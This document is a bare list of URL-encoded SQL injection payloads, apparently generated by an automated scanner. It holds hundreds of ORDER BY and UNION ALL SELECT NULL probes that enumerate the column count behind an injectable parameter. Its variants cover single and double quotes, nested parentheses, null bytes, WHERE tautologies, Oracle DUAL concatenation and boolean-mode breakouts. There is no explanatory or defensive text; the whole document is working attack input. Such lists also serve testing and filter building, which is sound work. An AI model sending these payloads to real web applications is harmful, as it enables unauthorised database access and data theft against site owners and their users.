1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20ORDER%20BY%201--%20 1234.5%22%20ORDER%20BY%208416--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20ORDER%20BY%201--%20 1234.5%25%27%29%20ORDER%20BY%207048--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20ORDER%20BY%201--%20 1234.5%25%27%29%29%20ORDER%20BY%208292--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20ORDER%20BY%201--%20 1234.5%25%27%29%29%29%20ORDER%20BY%202578--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20ORDER%20BY%201--%20 1234.5%25%27%20ORDER%20BY%205145--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20ORDER%20BY%201--%20 1234.5%00%27%29%20ORDER%20BY%202444--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20ORDER%20BY%201--%20 1234.5%00%27%20ORDER%20BY%203311--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%201414%3D1414%20ORDER%20BY%201--%20 1234.5%27%29%20WHERE%209764%3D9764%20ORDER%20BY%204485--%20 1234.5%27%29%20WHERE%206482%3D6482%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%27%29%20WHERE%208383%3D8383%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1234.5%27%29%20WHERE%201744%3D1744%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%208817%3D8817%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%201247%3D1247%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%207768%3D7768%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%207252%3D7252%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%209048%3D9048%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%201349%3D1349%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%204053%3D4053%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%205382%3D5382%20ORDER%20BY%201--%20 1234.5%22%29%20WHERE%207208%3D7208%20ORDER%20BY%205965--%20 1234.5%22%29%20WHERE%203157%3D3157%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%22%29%20WHERE%207703%3D7703%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1234.5%22%29%20WHERE%205479%3D5479%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%208234%3D8234%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%208052%3D8052%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%205887%3D5887%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%204677%3D4677%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%209840%3D9840%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%204235%3D4235%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%204410%3D4410%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%209599%3D9599%20ORDER%20BY%201--%20 1234.5%29%20WHERE%207216%3D7216%20ORDER%20BY%205320--%20 1234.5%29%20WHERE%208502%3D8502%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%29%20WHERE%204767%3D4767%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1234.5%29%20WHERE%206232%3D6232%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%208187%3D8187%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%203436%3D3436%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%204928%3D4928%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%202700%3D2700%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%207568%3D7568%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%203121%3D3121%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%208407%3D8407%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%204733%3D4733%20ORDER%20BY%201--%20 1234.5%27%20WHERE%202952%3D2952%20ORDER%20BY%203743--%20 1234.5%27%20WHERE%203265%3D3265%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%27%20WHERE%203139%3D3139%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1234.5%27%20WHERE%202779%3D2779%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%203448%3D3448%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%204986%3D4986%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%208494%3D8494%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%207936%3D7936%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%205133%3D5133%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%207618%3D7618%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%208701%3D8701%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%204332%3D4332%20ORDER%20BY%201--%20 1234.5%22%20WHERE%201577%3D1577%20ORDER%20BY%205245--%20 1234.5%22%20WHERE%203510%3D3510%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%22%20WHERE%205441%3D5441%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1234.5%22%20WHERE%209955%3D9955%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%207927%3D7927%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%204804%3D4804%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%208128%3D8128%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%209041%3D9041%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%206000%3D6000%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%205476%3D5476%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%202836%3D2836%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%207337%3D7337%20ORDER%20BY%201--%20 1234.5%20WHERE%209868%3D9868%20ORDER%20BY%207900--%20 1234.5%20WHERE%207662%3D7662%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%20WHERE%202284%3D2284%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1234.5%20WHERE%202996%3D2996%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1234.5%20WHERE%209390%3D9390%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%206195%3D6195%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%208442%3D8442%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%202886%3D2886%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%208128%3D8128%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%208310%3D8310%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%207569%3D7569%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27tgOm%27%20FROM%20DUAL%20WHERE%205141%3D5141%20ORDER%20BY%201--%20 1234.5%27%7C%7C%28SELECT%20%27lGLh%27%20FROM%20DUAL%20WHERE%208119%3D8119%20ORDER%20BY%202679--%20 1234.5%27%7C%7C%28SELECT%20%27JHsu%27%20FROM%20DUAL%20WHERE%202531%3D2531%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%27%7C%7C%28SELECT%20%27mUKn%27%20FROM%20DUAL%20WHERE%207389%3D7389%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27HSSS%27%20FROM%20DUAL%20WHERE%208848%3D8848%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27wAiP%27%20FROM%20DUAL%20WHERE%206707%3D6707%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27rjIf%27%20FROM%20DUAL%20WHERE%206647%3D6647%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27zWVv%27%20FROM%20DUAL%20WHERE%208882%3D8882%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27JQfJ%27%20FROM%20DUAL%20WHERE%208942%3D8942%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27welj%27%20FROM%20DUAL%20WHERE%201378%3D1378%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27KMwZ%27%20FROM%20DUAL%20WHERE%202209%3D2209%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27AKHa%27%20FROM%20DUAL%20WHERE%203720%3D3720%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27ZlSy%27%20WHERE%204415%3D4415%20ORDER%20BY%201--%20 1234.5%27%7C%7C%28SELECT%20%27tgyu%27%20WHERE%208128%3D8128%20ORDER%20BY%208862--%20 1234.5%27%7C%7C%28SELECT%20%27mdpa%27%20WHERE%203813%3D3813%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%27%7C%7C%28SELECT%20%27LMpv%27%20WHERE%208549%3D8549%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27Yrds%27%20WHERE%206799%3D6799%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27guTK%27%20WHERE%202501%3D2501%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27tANr%27%20WHERE%201908%3D1908%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27quXs%27%20WHERE%201440%3D1440%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27NjKt%27%20WHERE%206328%3D6328%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27wbkz%27%20WHERE%204485%3D4485%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27TeJs%27%20WHERE%205052%3D5052%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27AiEZ%27%20WHERE%203873%3D3873%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20WmVQ%20WHERE%202447%3D2447%20ORDER%20BY%201--%20 1234.5%27%2B%28SELECT%20TfSA%20WHERE%203297%3D3297%20ORDER%20BY%208100--%20 1234.5%27%2B%28SELECT%20AiFf%20WHERE%205220%3D5220%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%27%2B%28SELECT%20DrRi%20WHERE%209148%3D9148%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1234.5%27%2B%28SELECT%20ZMqe%20WHERE%202271%3D2271%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20hWYv%20WHERE%205638%3D5638%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20CXZj%20WHERE%201046%3D1046%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20LFoq%20WHERE%205107%3D5107%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20uWid%20WHERE%206350%3D6350%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20mlwW%20WHERE%205449%3D5449%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20zAvU%20WHERE%204174%3D4174%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20nNdB%20WHERE%209683%3D9683%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27VRKj%27%20WHERE%204219%3D4219%20ORDER%20BY%201--%20 1234.5%27%2B%28SELECT%20%27YRRJ%27%20WHERE%209709%3D9709%20ORDER%20BY%205844--%20 1234.5%27%2B%28SELECT%20%27tbgA%27%20WHERE%202722%3D2722%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%27%2B%28SELECT%20%27RSwt%27%20WHERE%202976%3D2976%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27HmoJ%27%20WHERE%208036%3D8036%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27tWwX%27%20WHERE%205571%3D5571%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27KJwJ%27%20WHERE%207606%3D7606%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27FFLv%27%20WHERE%207161%3D7161%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27sSXx%27%20WHERE%202571%3D2571%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27JYZz%27%20WHERE%208468%3D8468%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27Umht%27%20WHERE%204528%3D4528%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27fPtN%27%20WHERE%207749%3D7749%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%205687--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 -5852%29%20ORDER%20BY%201--%20 -1787%29%20ORDER%20BY%206171--%20 -9780%29%20UNION%20ALL%20SELECT%207929--%20 -4580%29%20UNION%20ALL%20SELECT%207268%2C7268--%20 -8486%29%20UNION%20ALL%20SELECT%206282%2C6282%2C6282--%20 -1446%29%20UNION%20ALL%20SELECT%201112%2C1112%2C1112%2C1112--%20 -8671%29%20UNION%20ALL%20SELECT%207294%2C7294%2C7294%2C7294%2C7294--%20 -1452%29%20UNION%20ALL%20SELECT%208160%2C8160%2C8160%2C8160%2C8160%2C8160--%20 